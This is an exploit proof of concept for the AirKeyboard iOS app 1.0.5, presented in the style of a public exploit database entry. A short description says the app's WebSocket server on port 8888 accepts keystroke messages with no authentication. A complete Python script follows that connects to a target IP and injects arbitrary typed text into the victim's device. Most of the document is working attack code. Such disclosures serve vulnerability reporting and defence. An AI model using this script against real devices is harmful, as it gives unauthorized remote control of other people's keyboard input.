# Exploit Title: AirKeyboard iOS App 1.0.5 - Remote Input Injection # Date: 2025-06-13 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://airkeyboardapp.com # Software Link: https://apps.apple.com/us/app/air-keyboard/id6463187929 # Version: Version 1.0.5 # Tested on: iOS 18.5 with AirKeyboard app ''' Description: The AirKeyboard iOS application exposes a WebSocket server on port 8888 which accepts arbitrary input injection messages from any client. No authentication or pairing process is required. This allows any attacker to type arbitrary keystrokes directly into the victim’s iOS device in real-time without user interaction, resulting in full remote input control. ''' import websocket import json import time target_ip = "192.168.8.101" ws_url = f"ws://{target_ip}:8888" text = "i'm hacker i can write on your keyboard :)" keystroke_payload = { "type": 1, "text": f"{text}", "mode": 0, "shiftKey": True, "selectionStart": 1, "selectionEnd": 1 } def send_payload(ws): print("[+] Sending remote keystroke...") ws.send(json.dumps(keystroke_payload)) time.sleep(1) ws.close() def on_open(ws): send_payload(ws) def on_error(ws, error): print(f"[!] Error: {error}") def on_close(ws, close_status_code, close_msg): print("[*] Connection closed") def exploit(): print(f"[+] Connecting to AirKeyboard WebSocket on {target_ip}:8888") ws = websocket.WebSocketApp(ws_url, on_open=on_open, on_error=on_error, on_close=on_close) ws.run_forever() if __name__ == "__main__": exploit()